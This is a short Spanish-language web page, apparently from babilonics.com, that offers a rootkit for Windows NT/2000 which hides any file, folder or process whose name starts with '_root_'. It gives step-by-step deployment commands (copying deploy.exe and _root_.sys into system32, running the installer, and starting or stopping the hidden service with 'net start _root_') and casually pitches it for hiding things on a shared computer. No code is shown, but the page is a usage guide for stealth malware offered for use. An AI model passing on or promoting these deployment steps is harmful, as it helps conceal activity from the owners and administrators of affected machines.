babilonics.com

Rootkit para windows NT/2K

Este rootkit nos demuestra con que facilidad es posible ocultar procesos, carpetas, archivos y otros objetos en winNT/2k, utilizando solo dos archivos, podemos instalar un servicio en nuestra maquina, que permite la ocultación de todo aquello que su nombre empiece por _root_ o de la misma forma que el archivo "_root_.sys".
Puedes probar con que facilidad oculta archivos este programa en tu windows, ¿compartes ordenador? Crea tu propia carpeta oculta ;-)
Primero copia _root_.sys y deploy.exe al common directory
copy deploy.exe %systemroot%\system32\
copy _root_.sys %systemroot%\system32\
despues ejecuta
deploy.exe en %systemroot%\system32
Para arrancar el rootkit desde la shell utiliza:
net start _root_
Para parrar el root kit utliza
net stop _root_
Este servicio solo podrá ser visto desde el device manager, todo tiene sus pegas 8b
Tested
NT 4.0 Server
Windows 2000
Si alguien lo prueba que me comente que le parece el root kit
Como utilizar este rootkit